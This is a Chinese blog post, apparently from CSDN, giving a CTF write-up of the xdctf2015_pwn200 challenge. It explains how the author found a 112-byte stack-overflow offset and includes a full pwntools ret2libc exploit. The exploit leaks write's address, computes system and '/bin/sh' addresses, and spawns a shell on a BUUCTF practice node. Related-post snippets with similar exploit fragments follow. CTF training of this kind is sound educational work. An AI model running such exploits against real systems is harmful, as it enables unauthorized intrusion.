xdctf2015_pwn200

于 2023-05-11 19:48:09 发布
阅读量199 收藏
点赞数
分类专栏: PWN 文章标签: pwn
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/130628776
版权
该文章展示了如何通过分析程序执行和内存布局,利用缓冲区溢出漏洞(BOF)来实现write函数的地址泄露,然后通过ret2libc技术构造payload,最终获取系统shell。作者首先通过动态测试确定偏移量,接着计算libc基地址并找到system和/bin/sh的地址,最后发送第二个payload执行系统命令。
摘要由CSDN通过智能技术生成

1,三连
在这里插入图片描述思路:猜测是溢出题。
依据:./bof的执行为见堆malloc特征,虽然未出现segment fault,可能是输入数量不够。

2,动态测试偏移
在这里插入图片描述偏移:112
3,IDA分析寻找利用点
在这里插入图片描述思路:write泄露libc,ret2libc类型。套模板即可。

4,payload

from pwn  import *
context.log_level="debug"

#start 
r = remote("node4.buuoj.cn",25646)
# r = process("./bof")
elf = ELF("./bof")
libc = ELF("./libc-2.23.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']

#attack
payload = 'M'*(0x6c+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.recv()
r.sendline(payload)
write_addr = u32(r.recv(4))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = 'M'*(0x6c+4) + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr)
r.recv()
r.sendline(payload)

r.interactive()

在这里插入图片描述完。

hercu1iz
关注
专栏目录
攻防世界 pwn进阶区 pwn-200
Kni9hT's Blog
03-04 1753
前言 一到夜晚就不太想睡…想了想还是把昨天(不,前天 )的那题pwn writeup写了吧。虚假の二进制选手终于捡起了他的pwn…话说从web新手区转到pwn进阶区,wtnl。 学习要点 DynELF的使用 plt地址和got地址的区别 如何利用write函数 思考 题目的逻辑不难,开启了NX防护(即不能直接执行栈上的数据,通常使用ROP,本题就是),没有给libc地址,有个明显的栈溢出漏...
CTF--2015中国西安电子科技大学XDCTF网络安全大赛之pwn
关注互联网安全的小虾米一枚
09-19 4532
write up 0x01 基本信息 本人初学,可能本题解答对大神来说,有些繁琐。(大神可以忽略飘过)。 分享在此,方便自己,也方便他人。 文件: xd_jwxt 大小: 8276 字节 修改时间: 2016年7月13日, 16:22:24 MD5: 07BE390A9328A365549A27D400462B59 SHA1: C0175B97E12670373
XDCTF2015 PWN200
Bill
03-01 1768
XDCTF 2015 PWN200 一. 源码(自己敲出来的) #include <stdio.h> #include <unistd.h> #include <string.h> int vuln(){ char buf[80]; setbuf(stdin, buf); return read(0, buf, 256)...
BUUCTF xdctf2015_pwn200
qq_51821131的博客
10-05 1639
xdctf2015_pwn200 检查一下保护 拖进ida看看 存在明显栈溢出,但是没有system和binsh 但是可以通过泄露,找到地址,并拿到shell from pwn import * from LibcSearcher import * p=remote('node4.buuoj.cn',26340) #context.terminal = ['tmux', 'splitw', '-h'] elf=ELF('./bof') read_got=elf.got['read'] write_pl
xdctf-pwn200-附件资源
03-05
xdctf-pwn200-附件资源
没有对方libc文件,如何getshell?xdctf12 pwn200 与 welpwn 的 writeup
哒君的博客
07-26 440
DynELF 文档:https://pwntools.readthedocs.io/en/stable/dynelf.html 简单来说,DynELF可以泄漏对方的libc信息 关于DynELF的原理,这个博客讲的很详细
[BUUCTF]PWN——xdctf2015_pwn200
mcmuyanga的博客
11-11 1179
xdctf2015_pwn200 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,没有发现什么铭感的地方,直接看main函数 vuln函数 参数buf存在溢出漏洞,由于开启了nx,没有可以直接利用的后门,这边使用ret2libc的方法 利用过程: 先用write函数泄露libc版本 payload='a'*(0x6c+4) #溢出到ret payload+=p32(wri
(攻防世界)(XDCTF-2015pwn200
PLpa的博客
07-13 2237
这一题和JarvisOJ中的level4简直不要太像了,只是改变了几个地址,改变了溢出点。 既然前面已经讲解了,这里就不再重复讲了,详细解法请看链接:https://blog.csdn.net/qq_43986365/article/details/95081996 完整exp如下: #! /usr/bin/env python from pwn import * p=remote('111.19...
XDCTF-2015 pwn-200 backdoorctf-2015 echo
qq_41071646的博客
05-17 689
XDCTF-2015 pwn-200 简单的泄露基址 这里就不多讲了 #!/usr/bin/python2 # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=remote("111.198.29.45",32529) io=process("./pwn") elf=ELF("./pwn") li...
[BUUCTF-pwn]——xdctf2015_pwn200
Y_peak的博客
03-17 282
[BUUCTF-pwn]——xdctf2015_pwn200 一个简单的ret2libc的题目, 前面写了不少了这里只给exp了 exploit from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',27025) elf = ELF('./bof') write_plt = elf.plt['write'] write_got = elf.got['write'] main = elf.symbols['main']
xdctf-pwn200
Vccxx的博客
04-08 1369
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
SCTF 2015 pwn试题分析
weixin_30819163的博客
05-11 180
Re1 是一个简单的字符串加密。程序使用了多个线程,然后进行同步。等加密线程加密好了之后才会启动验证线程。这个题比较坑的是IDA F5出来的结果不对,不知道是不是混淆机制。 刚开始看的是F5后的伪代码,一脸懵逼。后来看了下汇编才明白是怎么回事。 解密直接打表就可以,也可以写逆算法。 pwn1 用checksec看了一下保护机制,有canary+nx保护。漏洞是一个简单的栈溢出,但是...
sctf pwn200
weixin_30363981的博客
04-04 253
  题目给出了pwn200和libc.so。使用IDA查看程序,发现逻辑很简单。   使用checksec查看pwn200的安全属性,如下图:      发现NX enabled,No PIE。   在第一次读(0x08048524位置)的时候,可以读取17个字节,观察栈结构:   发现可以将nbytes覆盖,可以覆盖为0xff。   在第二次读(0x08048596位置)的时候,...
pwn-200(XDCTF-2015)--write up
ATFWUS的博客
03-03 2816
文件下载地址: 链接:https://pan.baidu.com/s/1W-bn57DPwr0GZlOsAl2enQ 提取码:z3sy 0x01.分析 checksec: 32位程序,只开启NX。 查看源码: 分析源码: 从源码可以得出,主要在read出有栈溢出漏洞。 程序并没有留后门,得靠自己想办法去执行,system('/bin/sh')。 漏洞利用思路: 首...
全网最硬核PWN入门_图解分析
个人笔记
04-03 7055
PWN序Linux环境下的基础知识从C源码到可执行文件的生成过程程序的编译与链接什么是可执行文件可执行文件分类PE/ELFELF文件格式区分节和段的存储区域加载ELF / 查看节和段区分布命令段(segment)与节(section)程序数据在内存中的组织分布大端序与小端序存储关键寄存器静态链接与动态链接常用汇编指令intel 和 AT&T汇编格式 序 PWN知识只有不断的重复,实践才能熟悉掌握。以下知识点以LINUX系统环境下为主要说明(Windows的会有点区别)。 Linux环境下的基础知识
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值